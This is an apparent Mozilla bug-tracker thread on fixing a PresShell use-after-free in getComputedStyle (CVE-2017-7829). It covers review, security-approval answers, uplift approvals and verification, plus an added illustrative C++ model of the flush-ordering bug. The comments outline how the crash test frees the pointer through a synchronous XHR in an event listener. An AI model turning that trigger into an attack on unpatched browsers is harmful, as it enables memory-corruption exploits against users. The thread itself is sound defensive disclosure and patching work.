> part is that I suspect this bug was already there before the patch (just
> more tricky, since it required getComputedStyle to be called inside a
> ::first-line or something like that, I believe).

Yeah, indeed, the shell is dead... Writing a patch now.
Just for reference. The flush in UpdateCurrentStyleSources is presShellForContent of course.
(I should've probably thought of this while writing bug 1406750 btw... :/)
Posted patch Patch.Splinter Review
Only fetch mPresShell after flushing the relevant content pres shell.
Attachment #8923022 - Flags: review?(bzbarsky)
Comment on attachment 8923022 [details] [diff] [review]
Patch.

r=me
Attachment #8923022 - Flags: review?(bzbarsky) → review+
Comment on attachment 8923022 [details] [diff] [review]
Patch.

[Security approval request comment]
How easily could an exploit be constructed based on the patch?

Not much, someone needs to figure out how to kill the PresShell from the other flush, which is non-trivial.

Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?
Kinda, it's not obvious that mPresShell is a weak pointer, but it's not hard to figure out either.

Which older supported branches are affected by this flaw?
All

If not all supported branches, which bug introduced the flaw?
The bug was pre-existing before bug 1371259 (a test-case was just harder to construct), but bug 1371259 makes that flush unconditional thus making this test-case crash.

Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be?
They would be roughly the same, it's moving the block introduced in bug 1371259 a few lines after it.

How likely is this patch to cause regressions; how much testing does it need?
I don't think much. This should finally fix this "flush of one presShell kills mPresShell" since we flush before getting the raw pointer.
Attachment #8923022 - Flags: sec-approval?
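The ordering problem described in the patch comment and in the sec-approval answers above, as an added C++ model that is not Gecko code and not the actual patch: PresShell, DocumentViewer, Document, ComputedStyleQuery and the two UpdateCurrentStyleSources* functions are constructed stand-ins, and a std::weak_ptr replaces the raw mPresShell so that a dead pointer is reported rather than dereferenced.

```cpp
#include <functional>
#include <memory>
#include <string>
#include <utility>

// Constructed stand-ins (not Gecko types): a viewer owns its PresShell; the
// computed-style object only holds a non-owning pointer to it.
struct PresShell {
    std::string presContextName;
    explicit PresShell(std::string name) : presContextName(std::move(name)) {}
};

struct DocumentViewer {
    std::shared_ptr<PresShell> shell;
    // Models nsDocumentViewer::Show -> Destroy -> DestroyPresShell from the
    // "freed by" stack: the old shell is released and a fresh one is created.
    void ReplacePresShell(std::string name) {
        shell = std::make_shared<PresShell>(std::move(name));
    }
};

struct Document {
    // Work that runs while this document's style is flushed. In crash.html it
    // is the DOMAttrModified listener whose synchronous XHR spins the event
    // loop, letting the popup's paint-suppression timer fire.
    std::function<void()> pendingNotifications;
    void FlushPendingNotifications() {
        if (pendingNotifications) pendingNotifications();
    }
};

// One getComputedStyle() call: the window it was invoked on and the document
// that owns the queried element (whose pres shell gets flushed).
struct ComputedStyleQuery {
    DocumentViewer* viewer;
    Document* contentDoc;
};

// Reads through the cached shell pointer. The weak_ptr stands in for the raw
// mPresShell so a dead pointer yields "" instead of a read of freed memory.
static std::string ReadThrough(const std::weak_ptr<PresShell>& cached) {
    auto shell = cached.lock();
    return shell ? shell->presContextName : "";
}

// Ordering before the patch: take mPresShell, then flush the content shell.
std::string UpdateCurrentStyleSourcesBuggy(ComputedStyleQuery& q) {
    std::weak_ptr<PresShell> mPresShell = q.viewer->shell;
    q.contentDoc->FlushPendingNotifications();  // may free the shell above
    return ReadThrough(mPresShell);             // use-after-free in the real code
}

// Ordering after the patch: flush first, only then take the pointer.
std::string UpdateCurrentStyleSourcesFixed(ComputedStyleQuery& q) {
    q.contentDoc->FlushPendingNotifications();
    std::weak_ptr<PresShell> mPresShell = q.viewer->shell;
    return ReadThrough(mPresShell);
}

struct Outcome {
    std::string buggy;
    std::string fixed;
};

// Shape of crash.html: o1 = window.open(...) is the popup viewer, o3 belongs
// to the opener document, and flushing the opener replaces the popup's shell
// when flushReplacesShell is true (a quiet flush otherwise, for comparison).
Outcome RunScenario(bool flushReplacesShell) {
    Outcome out;
    for (int pass = 0; pass < 2; ++pass) {
        DocumentViewer popup;
        popup.ReplacePresShell("initial-about-blank");
        Document opener;
        if (flushReplacesShell) {
            opener.pendingNotifications = [&popup] {
                popup.ReplacePresShell("loaded-x");
            };
        }
        ComputedStyleQuery q{&popup, &opener};
        if (pass == 0) {
            out.buggy = UpdateCurrentStyleSourcesBuggy(q);
        } else {
            out.fixed = UpdateCurrentStyleSourcesFixed(q);
        }
    }
    return out;
}
```

With a quiet flush both orderings agree; with the crash.html flush the buggy ordering ends up holding a pointer to a shell that no longer exists, which is exactly the read ASan flags at RefPtr.h:287.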
Release management, I'd like to give sec-approval for this on trunk and then take this on Beta and ESR52. It is a small patch and fixes a real issue here. I need your approval at this stage to do it though.

I'm fixing the "56 unaffected" flag as, given the answers to the questions and the ESR52 affected setting, that seems to be marked in error.
Flags: needinfo?(rkothari)
Flags: needinfo?(lhenry)
Seems reasonable, and this can make it into the beta 13 build on Monday if we land it by Monday morning
Flags: needinfo?(lhenry)
Comment on attachment 8923022 [details] [diff] [review]
Patch.

sec-approval+ for trunk.
Please nominate patches for ESR52 and Beta.
Flags: needinfo?(emilio)
Attachment #8923022 - Flags: sec-approval? → sec-approval+
https://hg.mozilla.org/integration/mozilla-inbound/rev/044406030675adf7dfdb0317fca3852fa1ea3ff7

Please request Beta & ESR52 approval on this ASAP.
Flags: needinfo?(rkothari)
Flags: needinfo?(nils)
Comment on attachment 8923022 [details] [diff] [review]
Patch.

Approval Request Comment
[Feature/Bug causing the regression]: bug 1371259 (but same gotchas as explained in comment 13 apply)
[User impact if declined]: security vulnerability.
[Is this code covered by automated tests?]: not landed yet.
[Has the fix been verified in Nightly?]: no
[Needs manual test from QE? If yes, steps to reproduce]: no 
[List of other uplifts needed for the feature/fix]: none
[Is the change risky?]: not very risky, see comment 13 for a more detailed analysis.
[Why is the change risky/not risky?]: Patch is minimal, only moves a flush before we actually get a raw pointer to something that may get killed because of that flush.
[String changes made/needed]: none
Flags: needinfo?(emilio)
Attachment #8923022 - Flags: approval-mozilla-esr52?
Attachment #8923022 - Flags: approval-mozilla-beta?
Comment on attachment 8923022 [details] [diff] [review]
Patch.

Sec-high, Beta57+, ESR52+
Attachment #8923022 - Flags: approval-mozilla-esr52?
Attachment #8923022 - Flags: approval-mozilla-esr52+
Attachment #8923022 - Flags: approval-mozilla-beta?
Attachment #8923022 - Flags: approval-mozilla-beta+
https://hg.mozilla.org/mozilla-central/rev/044406030675
Status: NEW → RESOLVED
Last Resolved: 2 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla58
Whiteboard: [adv-main57+][adv-esr52.5+]
Group: layout-core-security → core-security-release
Alias: CVE-2017-7829
Comment hidden (obsolete)
Correction:

Confirmed issue on Fx57.0b3.
Verified fixed on Fx57.0b14 and Fx52.5.0esr.
Alias: CVE-2017-7829
I have managed to reproduce the issue mentioned in comment 0 using Firefox 58.0a1 (BuildId:20171026092151).

This issue is no longer reproducible using Firefox 59.0a1 (BuildID:20171214095211), 58.0b11 (BuildId:20171212143601), 57.0.2 (BuildId:20171207111528) and 52.5.3 esr (BuildId:20171213195455) ASAN builds using Ubuntu 16.04 64bit.
Flags: sec-bounty?
Flags: sec-bounty? → sec-bounty+
Group: core-security-release